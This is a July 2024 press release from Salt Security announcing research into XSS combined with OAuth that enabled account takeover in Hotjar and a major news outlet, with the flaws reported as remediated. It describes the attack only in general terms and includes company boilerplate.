Salt-Labs researchers uncover security issues
that may have allowed attackers to leverage a vulnerability
commonly believed to be obsolete.
PALO
ALTO, Calif., July 29,
2024 /PRNewswire/ -- Salt Security, the leading
API security company, today released new threat research
from Salt-Labs, highlighting critical security flaws within
popular web analytics provider Hotjar and a renowned global news
outlet - highlighting elevated risk for enterprises. Hotjar is a
leading solution for product teams who want to go beyond
traditional web and product analytics so they can empathize with
and understand their users—to connect the dots between what's
happening and why it happens, so they can improve the user
experience (UX) and create customer delight. The company serves
over one million websites, including global brands. These
vulnerabilities could have potentially allowed an attacker
unlimited access to sensitive data sets within these services,
affecting millions of users and organizations worldwide.
These findings are not exclusive to these services but highlight
a bigger issue that likely exists within similar ecosystems.
The resurrection of an age-old security
issue
Cross-site scripting (commonly known as XSS) is a
security issue that has existed since the early days of the World
Wide Web. It has since been analyzed and mitigated in many layers
using countless techniques, ultimately reducing its overall
security risk to a minimal level. However, the emergence of new
technologies can cause a major ecosystem change, which introduces
new opportunities for attackers to leverage historical flaws such
as XSS and escalate security risk significantly.
Recent Salt-Labs research demonstrates exactly this point,
notably when combining XSS and recently popularized technology
known as OAuth. OAuth has become the de facto
authorization/authentication protocol of the past decade. Even if
organizations use it unknowingly, OAuth is utilized by thousands of
web services, as it plays a key role in any service that provides
'Social-Login' functions, among many others.
By combining OAuth features with the old XSS vulnerability,
Salt-Labs researchers have successfully proven the ability to take
over any account in Hotjar and the major news source's online
services.
To exploit this vulnerability, an attacker can simply send the
victim a valid link to the service they want to attack. This link
can be sent via any possible channel (email, text message, social
media, or posted in an online forum, etc). As the link is
completely legitimate, the victim will have practically no way to
determine if it is part of a larger attack without a deep technical
analysis. Once a victim clicks on the link, the attacker can gain
full control of the account, allowing them to perform any actions
on the account and gain access to any data stored in the
account.
A widespread issue
While Salt-Labs's research focused
on two "example" targets - Hotjar and the major news source, this
issue is not constrained to them. Due to the popularity of OAuth
and the widespread existence of XSS issues, this issue likely
exists in numerous other web services, showcasing the risks that
accompany bundled API usage.
We recommend that security teams read through the technical
details and detailed explanations listed in our blog post to
better understand the potential exposure of their online services.
We also recommend that users exercise caution when clicking on
unknown links, even those sent from trusted sources.
The Salt-Labs team has also released a unique tool that will
help companies assess their own risks of similar vulnerabilities
with the goal to reduce their risk profile. Until now, this tool
was used internally by Salt-Labs to identify risks and
vulnerabilities. If you are a domain/website owner and interested
in assessing your risk, please click here to complete your free
scan.
Our ongoing research demonstrates additional pillars to the
risks tangled in API usage, specifically with the use of
popular OAuth tools. At the beginning of 2024, we highlighted
these risks when we revealed critical OAuth vulnerabilities in the
popular AI Tool, ChatGPT.
About Salt Security
As the pioneer of the API security market, Salt Security protects
the APIs that form the core of every modern application. Protecting
some of the largest enterprises in the world, Salt's API Protection
Platform is the only API security solution that combines the power
of cloud-scale big data and time-tested ML/AI to detect and prevent
API attacks. With its patented approach to blocking today's
low-and-slow API attacks, only Salt provides the adaptive
intelligence needed to protect APIs. Salt's posture governance
engine also delivers operationalized API governance and threat
detection across organizations at scale. Unlike other API
governance solutions, Salt Security's AI-based runtime engine pulls
from the largest data lake in order to continuously train the
engine. Salt supports organizations through the entire API journey
from discovery, to posture governance and threat protection.
Deployed quickly and seamlessly integrated within existing systems,
the Salt platform gives customers immediate value and protection,
so they can innovate with confidence and accelerate their digital
transformation initiatives. For more information,
visit: https://salt.security/.
Media Contact
Sena
McGrand
Lumina Communications for Salt Security
salt@luminapr.com
View original content to download
multimedia:https://www.prnewswire.com/news-releases/salt-security-discovers-security-flaws-in-hotjar-potentially-affecting-sensitive-data-of-millions-utilizing-major-global-brands---issues-have-been-remediated-302208168.html
SOURCE Salt Security